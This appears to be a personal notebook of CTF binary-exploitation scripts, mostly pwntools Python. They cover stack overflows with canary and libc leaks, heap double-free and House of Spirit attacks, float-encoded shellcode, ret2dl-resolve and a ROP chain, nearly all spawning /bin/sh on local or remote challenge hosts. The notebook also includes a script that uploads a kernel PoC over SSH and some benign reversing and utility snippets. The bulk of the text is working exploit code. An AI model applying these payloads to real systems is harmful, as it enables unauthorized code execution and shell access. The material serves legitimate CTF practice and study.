# Round 2: return into the binary (core_starr + 0x80a) with the recovered
# canary in place, then repeat the name overflow to read a libc address.
pay = 'a'*136 + p64(cannary) + p64(core_starr + 0x80a)
p.recvuntil("What do you want to say: ")
p.sendline(pay)
p.recvuntil("What's your name: ")
pay = "a" * (136+8) + 'b'*8
p.send(pay)
p.recvuntil("b" * 8)
# Offsets 0x441270 / 0x5829d9 / 0x460480 are hard-coded for libc-2.27.so; the
# commented libc.symbols / libc.search forms are the portable alternative.
lib_starr = u64(p.recv(6) + '\x00\x00') - 0x441270 #libc.symbols['__libc_start_main'] #0x441270
success("lib_starr: " + hex(lib_starr))
p.recvuntil("What do you want to say: ")
bin_sh = lib_starr + 0x5829d9 #libc.search['/bin/sh']#
system_addr = lib_starr + 0x460480 #libc.symbols['system']#0x460480
pay = 'c'*136 + p64(cannary) + "qqqqqqqq" + p64(pop_rdi) + p64(bin_sh) + p64(system_addr)
p.send(pay)
p.interactive()
# Reference offsets kept by the author for glibc 2.23 (unused by this script).
'''
libc2.23:
system_offset = 0x45390   # 0x3f480
bin_sh_offset = 0x18cd57  # 0x1619d9
free_offset = 0x3e3e90
malloc_offset = 0x3e3e40
malloc_hook_offset = 0x3c4b10
free_hook_offset = 0x3c67a8

0x45216 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf02a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1147 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL

'''

CTF-wiki

2017 0ctf bheap

# -*- coding: utf-8 -*-
from pwn import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
# Local binary by default; the commented remote() line is the challenge server.
name = './bheap'
elf = ELF(name)
p = process(name)
#p = remote("111.198.29.45",30617)
if args.G:
    gdb.attach(p)

def alloc(s):
    """Command 1: allocate a block of ``s`` bytes (module tube ``p``)."""
    steps = (("Command: ", "1"), ("Size: ", str(s)))
    for prompt, reply in steps:
        p.recvuntil(prompt)
        p.sendline(reply)

def fill(i,s,data):
    """Command 2: write ``s`` bytes of ``data`` into block ``i`` (sendline,
    so a newline follows the data) via the module tube ``p``."""
    replies = (("Command: ", "2"),
               ("Index: ", str(i)),
               ("Size: ", str(s)),
               ("Content: ", data))
    for prompt, reply in replies:
        p.recvuntil(prompt)
        p.sendline(reply)

def free(i):
    """Command 3: free block ``i`` (module tube ``p``)."""
    steps = (("Command: ", "3"), ("Index: ", str(i)))
    for prompt, reply in steps:
        p.recvuntil(prompt)
        p.sendline(reply)

def dump(i):
    """Command 4: print block ``i``; the output stays in the tube for the caller."""
    steps = (("Command: ", "4"), ("Index: ", str(i)))
    for prompt, reply in steps:
        p.recvuntil(prompt)
        p.sendline(reply)

# Trailing "# n" comments are the block indices produced by each alloc().
# Python 2 script (str payloads concatenated with p64/p8 output).
alloc(10) # 0
alloc(10) # 1
alloc(10) # 2
alloc(10) # 3
alloc(10) # 4
alloc(0x80) # 5 

free(1)
free(3)
# fill() uses sendline, so every payload is followed by a newline byte.
payload = 'a'*24 + p64(0x21) + p8(0xa0)
fill(2,len(payload),payload)

payload = 'a'*24 + p64(0x21)
fill(4,len(payload),payload)
alloc(10) # 1
alloc(10) # 3 5

payload = 'a'*24 + p64(0x91)

fill(4,len(payload),payload)
alloc(0x80) # 6
free(5)
dump(3)

# The dumped bytes contain a libc pointer; 0x58 is the distance to main_arena
# for this libc (see offset_bin_main_arena in the Search Engine script).
p.recvuntil("Content: \n")
main_arena = u64(p.recv(6) + '\x00\x00') - 0x58
success("main_arena: " + hex(main_arena))

alloc(0x60) # 5
free(5)
payload = p64(main_arena-0x33)
fill(3,len(payload),payload)
alloc(0x60) # 5
alloc(0x60) # 6

# 0x399b00 and 0x3f35a are libc-build specific constants.
one_gadget = main_arena - 0x399b00 +  0x3f35a
payload = '|/bin/sh;' + 'a'*10 + p64(one_gadget)
fill(7,len(payload),payload)
alloc(0x20)
p.interactive()

2015 9447 CTF : Search Engine

Double_Free:

# -*- coding: utf-8 -*-
from pwn import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './search'
p = process(name)

# `G` on the command line attaches gdb.
if args.G:
    gdb.attach(p)

def search(s):
    """Menu option 1: search for word ``s`` (its length is sent first), via
    the module tube ``p``."""
    replies = (("3: Quit\n", "1"),
               ("Enter the word size:\n", str(len(s))),
               ("Enter the word:\n", s))
    for prompt, reply in replies:
        p.recvuntil(prompt)
        p.sendline(reply)

def delete(s):
    """Answer the 'Delete this sentence (y/n)?' prompt with ``s`` ('y' or 'n')."""
    question = "Delete this sentence (y/n)?\n"
    p.recvuntil(question)
    p.sendline(s)
    
def index(s):
    """Menu option 2: index sentence ``s`` (its length is sent first), via the
    module tube ``p``."""
    replies = (("3: Quit\n", "2"),
               ("Enter the sentence size:\n", str(len(s))),
               ("Enter the sentence:\n", s))
    for prompt, reply in replies:
        p.recvuntil(prompt)
        p.sendline(reply)

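def offset_bin_main_arena(idx, word_size=None):
    """Byte offset from the start of glibc's main_arena to bin ``idx``, as seen
    through a chunk pointer (hence the final "bin overlap" correction).

    ``word_size`` is in bits and defaults to pwntools' ``context.word_size``;
    passing it explicitly makes the helper usable without pwntools.  Uses
    integer division so the result is an int on Python 3 too (the original
    ``/ 8`` yields a float there).
    """
    if word_size is None:
        word_size = context.word_size
    word_bytes = word_size // 8
    offset = 4  # lock
    offset += 4  # flags
    offset += word_bytes * 10  # fastbin array
    offset += word_bytes * 2  # top, last_remainder
    offset += idx * 2 * word_bytes  # bins[idx]
    offset -= word_bytes * 2  # bin overlap
    return offset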
 
# Computed but not used below; the script hard-codes 0x58 instead.
unsortedbin_offset_main_arena = offset_bin_main_arena(0)

# Python 2 script (str payloads with p64 output).  A 0x87-byte sentence is
# indexed, found and deleted; searching for "\x00" then prints the bytes of the
# freed buffer, which start with a libc pointer.
index("a"*0x85 + " s")
search("s")
delete('y')
search("\x00")
p.recvuntil("Found 135: ")
lib_addr = u64(p.recv(6) + '\x00\x00') 
# 0x399b58 and 0x3f306 are libc-build specific constants.
one_gadget_addr = lib_addr - 0x399b58 + 0x3f306
main_arena_addr = lib_addr - 0x58
delete('n')

# Three sentences of the same size; each delete('y') below answers one
# "Delete this sentence" prompt for the matching search hits.
index('a'*0x5d + ' d')
index('b'*0x5d + ' d')
index('c'*0x5d + ' d')

search("d")
delete("y")
delete("y")
delete("y")

search("\x00")
delete("y")
delete("n")
delete("n")

fake_chunk_addr = main_arena_addr - 0x33
fake_chunk = p64(fake_chunk_addr).ljust(0x60, 'f')

index(fake_chunk)
index('a' * 0x60)   # allocate chunk_a
index('b' * 0x60)   # allocate chunk_b
payload = '|/bin/sh;'
payload += (0x13-len(payload))*'a' + p64(one_gadget_addr)  
payload = payload.ljust(0x60, 'f')
index(payload)      # malloc_hook now holds one_gadget

success("lib_addr: " + hex(lib_addr))
p.interactive()

2014 hack.lu oreo

House Of Spirit:

from pwn import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './oreo'
p = process(name)

# `G` on the command line attaches gdb.
if args.G:
    gdb.attach(p)

def add(name,descrip):
    """Action 1: send the choice, the rifle name and the description as three
    lines.  The prompt reads ("Action: ", "Rifle name: ", "Rifle description: ")
    were commented out in the original and are not performed here either."""
    for line in ('1', name, descrip):
        p.sendline(line)


def show():
    """Action 2: request the listing and consume the output up to the
    separator line; what follows is left for the caller."""
    separator = '===================================\n'
    p.sendline('2')
    p.recvuntil(separator)

def order():
    """Action 3: place the order (no prompt is consumed)."""
    choice = '3'
    p.sendline(choice)


def message(notice):
    """Action 4: send ``notice`` as the order message (no prompt is consumed)."""
    for line in ('4', notice):
        p.sendline(line)

# Python 2 script.  The name field is 27 bytes + a 4-byte address; 0x804a248,
# 0x804a2a8 and 0x804a250 are fixed addresses of this non-PIE 32-bit binary.
name = 'a'*27 + p32(0x804a248)
descrip = 'a'*25
add(name,descrip)
show()
p.recvuntil("===================================\nName: \nDescription: ")
put_addr = u32(p.recv(4))
# 0x24d40 is the puts->system distance of one specific libc build.
system_addr = put_addr - 0x24d40
success("put_addr: " + hex(put_addr))
success("system_addr: " + hex(system_addr))
# 0x3e filler entries so the counter reaches the value used as a size below.
for i in range(1,0x3f):
    name = 'a'*27 + p32(0)
    descrip = 'a'*25
    add(name,descrip)
name = 'a'*27 + p32(0x804a2a8)
descrip = 'a'*25
add(name,descrip)
payload = 0x20 * '\x00' + p32(0x40) + p32(0x90)
message(payload)

order()
add('a'*4,p32(0x804a250))

notice = p32(system_addr) + '||/bin/sh\x00'
message(notice)

p.interactive()

常用URL

字典:

https://github.com/rootphantomer/Blasting_dictionary

upload

#!/usr/bin/python
from pwn import *

# SSH endpoint and credentials of the target box (placeholder values as given
# in the original note); only used when the script is started with an argument.
HOST = "12.12.12.12"
PORT =  1234

USER = "pwn"
PW = "sir"

def compile():
    """Build poc.c into a static binary named poc with gcc (warnings off).
    Shadows the builtin ``compile`` for the rest of the module."""
    log.info("Compile")
    cmd = ["gcc", "-w", "-static", "poc.c", "-o", "poc"]
    os.system(" ".join(cmd))

def exec_cmd(cmd):
    """Send ``cmd`` to the remote shell ``r`` and wait for the next "$ " prompt."""
    prompt = "$ "
    r.sendline(cmd)
    r.recvuntil(prompt)

def upload():
    """Copy the local file ``poc`` to the remote shell ``r`` as ``exp``.

    The file is base64-encoded and appended to the remote file ``benc`` in
    300-character chunks through ``echo``, then decoded and made executable.
    Progress is reported through a pwntools progress logger.  ``base64`` must
    already be in scope (the original relies on ``from pwn import *``).
    """
    progress = log.progress("Upload")

    with open("poc", "rb") as f:
        data = f.read()

    encoded = base64.b64encode(data)
    total = len(encoded)

    r.recvuntil("$ ")

    for offset in range(0, total, 300):
        progress.status("%d / %d" % (offset, total))
        chunk = encoded[offset:offset+300]
        exec_cmd("echo \"%s\" >> benc" % (chunk))

    exec_cmd("cat benc | base64 -d > exp")
    exec_cmd("chmod +x exp")

    progress.success()

def exploit(r):
    """Build and upload the PoC, then hand the shell ``r`` to the user.

    Note: ``compile``/``upload`` use the module-level ``r``, not this parameter.
    """
    compile()
    upload()
    r.interactive()

if __name__ == "__main__":
    # Any command-line argument selects the SSH target; otherwise the local
    # start.sh is run and the script pauses so a debugger can attach to the pid.
    if len(sys.argv) > 1:
        session = ssh(USER, HOST, PORT, PW)
        r = session.run("/bin/sh")
        exploit(r)
    else:
        r = process("./start.sh")
        print util.proc.pidof(r)
        pause()
        exploit(r)

vmlinux

#!/bin/sh
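# Print $1 to stdout and exit 0 if it is an ELF object (readelf accepts its
# header); otherwise return 1 so the caller can try the next candidate.
# The path is quoted so names with spaces or glob characters stay intact.
check_vmlinux()
{
	# Use readelf to check if it's a valid ELF
	# TODO: find a better to way to check that it's really vmlinux
	#       and not just an elf
	readelf -h "$1" > /dev/null 2>&1 || return 1

	cat "$1"
	exit 0
}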

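# $1 = magic bytes of a compression format, $2 = marker characters for tr,
# $3 = decompressor command (may include arguments, e.g. 'lzop -d').
# Every occurrence of the magic inside $img is fed to the decompressor; if the
# result is an ELF, check_vmlinux prints it and exits the script.
try_decompress()
{
	# The obscure use of the "tr" filter is to work around older versions of
	# "grep" that report the byte offset of the line instead of the pattern.

	# Try to find the header ($1) and decompress from here.
	# $pos and $tmp are quoted; $3 must stay unquoted so its arguments split.
	for	pos in `tr "$1\n$2" "\n$2=" < "$img" | grep -abo "^$2"`
	do
		pos=${pos%%:*}
		tail -c+"$pos" "$img" | $3 > "$tmp" 2> /dev/null
		check_vmlinux "$tmp"
	done
}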

# Check invocation: exactly one argument, a non-empty file.
me=${0##*/}
img=$1
if	[ $# -ne 1 -o ! -s "$img" ]
then
	echo "Usage: $me <kernel-image>" >&2
	exit 2
fi

# Prepare temp files: removed on exit by the trap.  Only three X's in the
# template leaves mktemp a small random suffix -- consider more.
tmp=$(mktemp /tmp/vmlinux-XXX)
trap "rm -f $tmp" 0

# Try each known compression signature; a hit prints vmlinux and exits.
try_decompress '\037\213\010' xy    gunzip
try_decompress '\3757zXZ\000' abcde unxz
try_decompress 'BZh'          xy    bunzip2
try_decompress '\135\0\0\0'   xxx   unlzma
try_decompress '\211\114\132' xy    'lzop -d'
try_decompress '\002!L\030'   xxx   'lz4 -d'
try_decompress '(\265/\375'   xxx   unzstd

# Finally check for uncompressed images or objects:
check_vmlinux $img

# Bail out:
echo "$me: Cannot find vmlinux." >&2

python&&C混合编程

使用python标准库中自带的ctypes模块进行python和c的混合编程,需要先查找动态链接库:

sir@sir-PC:~/desktop$ ldd pwn1
	linux-vdso.so.1 (0x00007ffcaa9e0000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f6a323f6000)
	/lib64/ld-linux-x86-64.so.2 (0x00007f6a327d9000)

from pwn import *
from ctypes import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = "./pwn1"
elf = ELF(name)
# The host's libc loaded through ctypes so rand()/srand() can be called
# directly; path taken from the ldd output above.
libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
#p = process(name)
p = remote('111.198.29.45',30261)
if args.G:
    gdb.attach(p)

# The name field is followed by a seed value (1); seeding the local libc the
# same way reproduces the ten rand()%6+1 answers the target expects.
p.recvuntil("Your name:")
p.sendline('a'*0x20 + p64(0x1))
libc.srand(1)
for i in range(10):
    num = str(libc.rand()%6+1)
    p.recvuntil('number:')
    p.sendline(num)
p.interactive()

qemu

打包:

find . | cpio -o --format=newc > ../rootfs.cpio

解压:

cpio -idmv < ../rootfs.cpio

启动:

#!/bin/bash
# Boot bzImage with rootfs.cpio as the initrd on a serial console only
# (no graphics), 256 MB RAM, one core, SMEP enabled on the virtual CPU, and a
# gdb stub listening on TCP port 1234.  oops=panic panic=1 makes the guest
# panic on an oops and reboot after one second instead of limping on.
qemu-system-x86_64 \
-initrd rootfs.cpio \
-kernel bzImage \
-append 'console=ttyS0 root=/dev/ram oops=panic panic=1' \
-monitor /dev/null \
-m 256M \
--nographic  \
-smp cores=1,threads=1 \
-cpu kvm64,+smep \
-gdb tcp::1234

关闭 kptr_restrict:

 echo 0 > /proc/sys/kernel/kptr_restrict

IDA_IDC脚本

dump数值

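// Dump the raw bytes in [0x403230, 0x403617) from the database to D:\dump.txt.
auto i,fp;
fp = fopen("D:\\dump.txt","wb");
for(i=0x403230;i<0x403617;i++)
    fputc(Byte(i),fp);
// The original never closed the handle, so buffered bytes could stay unflushed.
fclose(fp);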

dump汇编代码

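// Write "address: disassembly" for every instruction in [0x401000, 0x40106C)
// to dump.txt; MakeCode returns the instruction length used to step forward.
auto code,n,i,fp;
fp = fopen("C:\\Users\\sir\\Desktop\\dump.txt","wb");
for(i=0x401000;i<0x40106C;){
    n = MakeCode(i);
    fprintf(fp,"%x: %s\n",i,GetDisasm(i));
    i = i + n;
}
// Close before reporting so the file is complete when "Ok!" appears.
fclose(fp);
Message("Ok!\n");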

解密代码

# IDAPython: XOR-decode 181 bytes starting at 0x600b00 in place with key 0xc.
# Assumes the IDA namespace is loaded; idc.Byte / PatchByte are the pre-7.x
# API names (idc.get_wide_byte / idc.patch_byte on newer IDA) -- confirm version.
for i in range(0x600b00, 0x600b00+181):
    x = idc.Byte(i) ^ 0xc
    PatchByte(i, x)
print("Ok...")

python处理文件

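'''
import re
file1 = open('sir.log', 'r')
file2 = open('sir.txt', 'w')
for line in file1.readlines():
    if re.match(r'^name_cn.*\n',line):
        file2.write(line)
'''
# -*- coding:utf-8 -*-
#! python2
import shutil
# Copy readDir to writeDir keeping only the first occurrence of every line
# (exact match, newline included); `a` counts the lines written.
# Both files are closed by the with-block even if the loop raises; the
# original left the input file open.
a=0
readDir = "./sir.txt"  #old
writeDir = "./new.txt" #new
lines_seen = set()
with open(writeDir, "w") as outfile, open(readDir, "r") as f:
    for line in f:
        if line not in lines_seen:
            a+=1
            outfile.write(line)
            lines_seen.add(line)
            print(a)
            print('\n')
print("success")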

i春秋_break

from pwn import *
context.log_level = 'debug'
name = './pwn'
p = process(name)
#p = remote('106.75.2.53', 10008)
elf = ELF(name)
if args.G:
    gdb.attach(p)

# Python 2 script for a non-PIE 32-bit binary (main_addr is fixed).
main_addr = 0x080486DD
# Round 1: the name field overflows into a return address; printf@plt is
# called with read@got as argument, then main is re-entered.
p.recvuntil("Yo, what's your name:\n")
pay = 'a'*12 + p32(elf.plt['printf']) + p32(main_addr) + p32(elf.got['read']) + 'b'*4
p.sendline(pay)
p.recvuntil("bbbb\n")
# 0xfffeffef is the value the length check accepts (see the breakingbad
# script below for the same trick with '\xff\xff').
payload = 'Methamphetamine' + p32(0xfffeffef)
p.sendline(payload)
p.recvuntil('packing drugs...\n')
printf_addr = u32(p.recv()[4:8])
# 0x13e80 / 0x12c24a are distances inside one specific libc build.
system_addr = printf_addr - 0x13e80 
bin_sh_addr = printf_addr + 0x12c24a 
success("printf_addr " + hex(printf_addr))
success("system_addr " + hex(system_addr))

# Round 2: same overflow, this time returning into system("/bin/sh").
pay1 = 'a'*12 + p32(system_addr) + p32(main_addr) + p32(bin_sh_addr) + 'b'*4
p.sendline(pay1)
p.recvuntil("bbbb\n")
payload = 'Methamphetamine' + p32(0xfffeffef)
p.sendline(payload)
p.interactive()

看雪_流浪者

#include<stdio.h>
/* Maps an ASCII code onto the index used into `source`: digits -> 0..9,
 * lowercase -> 10..35, uppercase -> 36..61.  Any other code yields -1 so the
 * caller skips it (the original's "x++; continue;" path). */
static int source_index(int x) {
	if (x >= 48 && x <= 57) {
		return x - 48;
	}
	if (x >= 97 && x <= 122) {
		return x - 87;
	}
	if (x >= 65 && x <= 90) {
		return x - 29;
	}
	return -1;
}

/* For every key position, prints each code x in [48, 122) whose mapped
 * source character equals key[i].  Index 0 is excluded by the y > 0 test and
 * the loop deliberately runs 26 times over a 25-character key (the last
 * round compares against the terminating NUL and prints nothing), exactly
 * as the original did. */
int main() {
	char source[] = "abcdefghiABCDEFGHIJKLMNjklmn0123456789opqrstuvwxyzOPQRSTUVWXYZ" ;
	char key[] = "KanXueCTF2019JustForhappy";
	int i;
	for ( i = 0; i < 26; i++ ) {
		int x;
		for ( x = 48; x < 122; x++ ) {
			const int y = source_index(x);
			if ( y > 0 && y < 62 && source[y] == key[i] ) {
				printf("%c",x); //j0rXI4bTeustBiIGHeCF70DDM
			}
		}
	}
	return 0;
}

i春秋_loading

mmap函数可以使空间拥有可执行权限;
计算机浮点数的表示方法;

from pwn import *
import struct
# Remote instance by default; the commented process() line runs it locally.
p = remote('106.75.2.53',10009)
#p = process('./loading')
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
if args.G:
    gdb.attach(p)

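def get_int(s):
    """Interpret the 4-byte ``s`` as a little-endian float, multiply by 2333 and
    return the unsigned 32-bit integer whose little-endian encoding is the
    truncated product (this is what the target's float-to-int path produces).

    ``s`` may be a Python 2 ``str`` or ``bytes``; on Python 3 a ``str`` is
    encoded as latin-1 so the same '\\x..' escapes work.  The product is
    truncated toward zero before packing -- Python 2's struct did that
    implicitly (with a warning), Python 3 raises on a float argument.
    Raises struct.error if the truncated value does not fit in 32 bits.
    """
    if not isinstance(s, bytes):
        s = s.encode('latin-1')
    a = struct.unpack('<f', s)[0]*2333
    return struct.unpack('I', struct.pack('<I', int(a)))[0]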

# Each line sent is a decimal number that the target converts back to a float
# and stores as raw bytes; the 4-byte strings below are therefore the bytes
# that end up in memory (the trailing comments give their instruction meaning,
# as annotated by the author).  Python 2 str arguments.
for i in range(3):
  p.sendline(str(get_int('\x00\x00\x00\x00')))

p.sendline(str(get_int('\x99\x89\xc3\x47')))     # mov ebx, eax
p.sendline(str(get_int('\x41\x44\x44\x44')))     # nop/align

for c in '/bin/sh\x00':
  p.sendline(str(get_int('\x99\xb0'+c+'\x47')))  # mov al, c
  p.sendline(str(get_int('\x57\x89\x03\x43')))   # mov [ebx], eax; inc ebx
  
for i in range(8):
  p.sendline(str(get_int('\x57\x4b\x41\x47')))   # dec ebx
  
p.sendline(str(get_int('\x99\x31\xc0\x47')))     # xor eax, eax
p.sendline(str(get_int('\x99\x31\xc9\x47')))     # xor ecx, ecx
p.sendline(str(get_int('\x99\x31\xd2\x47')))     # xor edx, edx
p.sendline(str(get_int('\x99\xb0\x0b\x47')))     # mov al, 0xb
p.sendline(str(get_int('\x99\xcd\x80\x47')))     # int 0x80

# 'c' ends the input phase on the target.
p.sendline('c')
p.interactive()
[*] Switching to interactive mode
[DEBUG] Received 0xb bytes:
    'try to pwn\n'
try to pwn
$ cat flag
[DEBUG] Sent 0x9 bytes:
    'cat flag\n'
[DEBUG] Received 0x2b bytes:
    'flag{7a1735b9-fcaf-43fd-8d5a-dd49baf6e077}\n'
flag{7a1735b9-fcaf-43fd-8d5a-dd49baf6e077}
$ 
[*] Closed connection to 106.75.2.53 port 10009

XDCTF_pwn01

from pwn import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './main'
p = process(name)
elf= ELF(name)
# Section addresses read from the ELF; the trailing comments are the values
# observed for this binary.
rel_plt_addr = elf.get_section_by_name('.rel.plt').header.sh_addr   #0x8048330
dynsym_addr =  elf.get_section_by_name('.dynsym').header.sh_addr    #0x80481d8
dynstr_addr = elf.get_section_by_name('.dynstr').header.sh_addr     #0x8048278
resolve_plt = 0x08048380
leave_ret_addr = 0x0804851D
# Writable scratch area (non-PIE binary) where the fake tables are placed.
start = 0x804aa00
fake_rel_plt_addr = start
fake_dynsym_addr = fake_rel_plt_addr + 0x8
fake_dynstr_addr = fake_dynsym_addr + 0x10
bin_sh_addr = fake_dynstr_addr + 0x7

# Python 2: the division in r_info must stay integral (use // on Python 3).
n = fake_rel_plt_addr - rel_plt_addr
r_info = (((fake_dynsym_addr - dynsym_addr)/0x10) << 8) + 0x7
str_offset = fake_dynstr_addr - dynstr_addr
fake_rel_plt = p32(elf.got['read']) + p32(r_info)
fake_dynsym = p32(str_offset) + p32(0) + p32(0) + p32(0x12000000)
fake_dynstr = "system\x00/bin/sh\x00\x00"
# Stage 1: overflow (108 bytes) that calls read(0, start-20, 0x100) and pivots
# the stack to start-20 via leave; ret.
pay1 = 'a'*108 + p32(start - 20) + p32(elf.plt['read']) + p32(leave_ret_addr) + p32(0) + p32(start - 20) + p32(0x100)
p.recvuntil('Welcome to XDCTF2015~!\n')
p.sendline(pay1)
# Stage 2: the data read into start-20: a call into the resolver with the
# fake relocation offset n, followed by the fake tables themselves.
pay2 = p32(0x0) + p32(resolve_plt) + p32(n) + 'aaaa' + p32(bin_sh_addr) + fake_rel_plt + fake_dynsym + fake_dynstr
p.sendline(pay2)
success(".rel_plt: " + hex(rel_plt_addr))
success(".dynsym: " + hex(dynsym_addr))
success(".dynstr: " + hex(dynstr_addr))
success("fake_rel_plt_addr: " + hex(fake_rel_plt_addr))
success("fake_dynsym_addr: " + hex(fake_dynsym_addr))
success("fake_dynstr_addr: " + hex(fake_dynstr_addr))
success("n: " + hex(n))
success("r_info: " + hex(r_info))
success("offset: " + hex(str_offset))
success("system_addr: " + hex(fake_dynstr_addr))
success("bss_addr: " + hex(elf.bss()))
p.interactive()

sha1加密

from hashlib import *
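def find_sha1_containing(needle, start=0):
    """Return ``(i, hexdigest)`` for the smallest integer ``i >= start`` whose
    SHA-1 hex digest of ``str(i)`` (UTF-8) contains ``needle``.

    Loops without bound, so the caller must pick a needle that is reachable.
    Pulled out of the original top-level loop so it can be reused and tested.
    """
    i = start
    while True:
        digest = sha1(str(i).encode('utf-8')).hexdigest()
        if needle in digest:
            return i, digest
        i += 1


# Same output as the original script: the matching integer, then its digest.
i, result = find_sha1_containing('40bd001563085f')
print("flag: " + str(i))
print(result)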

2017湖湘杯_pwn300

程序在计算加减乘除功能的时候,将结果保存在申请的堆中,最后将堆中的结果复制到栈中,这就导致了可能会栈溢出;
然后 程序又是通过静态编译的,可以在程序中找到合适ROP链;

ROPgadget --binary pwn300 --ropchain

然后程序又只能输入十进制的数,可以通过ctypes.c_int32(j).value的方式输入;

from pwn import *
import binascii
import ctypes as ct
from struct import pack
#context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']

# Local, statically linked binary (see the ROPgadget note above).
name = './helloworld'
io = process(name)
elf= ELF(name)
#libc = ELF('./libc_32.so.6')
if args.G:
    gdb.attach(io)

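def base_addr(pro_addr,offset):
    """Return ``pro_addr - offset`` where ``pro_addr`` is an int or a numeric
    string such as "0x8048000" or "134512640".

    The original passed the string to eval(), which executes arbitrary Python;
    int(s, 0) parses the same numeric literals without that risk.  Unused by
    the rest of the script.
    """
    if isinstance(pro_addr, str):
        pro_addr = int(pro_addr.strip(), 0)
    return pro_addr - offset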

# ROP chain for the static 32-bit binary, as generated by `ROPgadget --ropchain`
# (see above); the comments name each gadget.  Python 2 script (xrange,
# b2a_hex returning str).
p=[]

p.append( 0x0806ed0a)  # pop edx ; ret
p.append( 0x080ea060)  # @ .data
p.append( 0x080bb406)  # pop eax ; ret
p.append(eval('0x'+binascii.b2a_hex('nib/')))
p.append( 0x080a1dad)  # mov dword ptr [edx], eax ; ret
p.append( 0x0806ed0a)  # pop edx ; ret
p.append( 0x080ea064)  # @ .data + 4
p.append( 0x080bb406)  # pop eax ; ret
p.append(eval('0x'+binascii.b2a_hex('hs//')))
p.append(0x080a1dad)  # mov dword ptr [edx], eax ; ret
p.append(0x0806ed0a)  # pop edx ; ret
p.append(0x080ea068)  # @ .data + 8
p.append(0x08054730)  # xor eax, eax ; ret
p.append(0x080a1dad)  # mov dword ptr [edx], eax ; ret
p.append(0x080481c9)  # pop ebx ; ret
p.append(0x080ea060)  # @ .data
p.append(0x0806ed31)  # pop ecx ; pop ebx ; ret
p.append(0x080ea068)  # @ .data + 8
p.append(0x080ea060)  # padding without overwrite ebx
p.append(0x0806ed0a)  # pop edx ; ret
p.append(0x080ea068)  # @ .data + 8
p.append(0x08054730)  # xor eax, eax ; ret
p.append(0x0807b75f)  # inc eax ; ret
p.append(0x0807b75f)  # inc eax ; ret
p.append(0x0807b75f)  # inc eax ; ret
p.append(0x0807b75f)  # inc eax ; ret
p.append(0x0807b75f)  # inc eax ; ret
p.append(0x0807b75f)  # inc eax ; ret
p.append(0x0807b75f)  # inc eax ; ret
p.append(0x0807b75f)  # inc eax ; ret
p.append(0x0807b75f)  # inc eax ; ret
p.append(0x0807b75f)  # inc eax ; ret
p.append(0x0807b75f)  # inc eax ; ret
p.append(0x08049781)  # int 0x80

tempnum=0
#debug()
io.recvuntil('How many times do you want to calculate:')
io.sendline('255')
# 16 padding results (operation 3 with x=0, y=1) before the chain itself.
for i in xrange(0,16):
    io.recvuntil('5 Save the result\n')
    io.sendline('3')
    io.recvuntil('input the integer x:')
    io.sendline(str(tempnum))
    io.recvuntil('input the integer y:')
    io.sendline('1')

# The target only accepts decimal input, so each 32-bit gadget address is
# sent as a signed int (ctypes.c_int32), using operation 1 with y=0.
for j in p:
    io.recvuntil('5 Save the result\n')
    io.sendline('1')
    io.recvuntil('input the integer x:')
    io.sendline(str(ct.c_int32(j).value))
    io.recvuntil('input the integer y:')
    io.sendline('0')

# Option 5 copies the saved results to the stack (see the note above).
io.recvuntil('5 Save the result\n')
io.sendline('5')
io.interactive()
io.close()

西湖论剑_story

from pwn import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './story'
#p = process(name)
p = remote('ctf2.linkedbyx.com',10955)
elf= ELF(name)
#libc = ELF('./libc_32.so.6')
if args.G:
    gdb.attach(p)

# Python 2 script.  The ID field is printed back through printf, so "%15$p"
# leaks the 16th stack argument (0x... plus 16 hex digits = 18 chars).
p.recvuntil('Please Tell Your ID:')
p.sendline('aaaa%15$p')
p.recvuntil('aaaa')
x = p.recv()
canary = int(x[0:18],16)

# Fixed addresses of this non-PIE binary.
pop_rdi_addr = 0x400bd3
main = 0x400876
# Round 1: 136-byte overflow with the canary restored; puts(__libc_start_main@got)
# then back to main.  '200' answers the length prompt.
pay = 136 * 'a' + p64(canary) + 'q'*8 + p64(pop_rdi_addr) + p64(elf.got['__libc_start_main']) + p64(elf.plt['puts']) + p64(main)
#p.recvuntil('You can speak your story:\n')
p.sendline('200')
p.recvuntil('You can speak your story:\n')
p.sendline(pay)
__libc_start_main_addr = u64(p.recv(6) + '\x00\x00')
# 0x24c50 is the __libc_start_main->system distance of the remote libc.
system_addr = __libc_start_main_addr + 0x24c50

# Round 2: "/bin/sh;" is stored in the ID buffer and its address leaked via %p.
pay1 = "/bin/sh;%p"
p.recvuntil('Please Tell Your ID:')
p.sendline(pay1)
p.recvuntil('/bin/sh;')
binsh_addr = p.recv()
binsh_addr = int(binsh_addr[0:15],16)

pay2 = 136 * 'a' + p64(canary) + 'q'*8 + p64(pop_rdi_addr) + p64(binsh_addr) + p64(system_addr) 
#p.recvuntil('You can speak your story:\n')
p.sendline('200')
p.recvuntil('You can speak your story:\n')
p.sendline(pay2)
print "canary: " + hex(canary)
print "__libc_start_main: " + hex(__libc_start_main_addr)
print "system_addr: " + hex(system_addr)
print "binsh_addr: " + hex(binsh_addr)
p.interactive()
# flag{35d06db7c9b25265da7ee6a384ebef5a}

i春秋_breakingbad

from pwn import *
import sys
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './break'
p = process(name)
#p = remote('106.75.2.53',10008)
elf= ELF(name)
#libc = ELF('./bc.so.6')
if args.G:
    gdb.attach(p)
#0x804863c

# Python 2 script, 32-bit non-PIE target (0x8048470 is a fixed address).
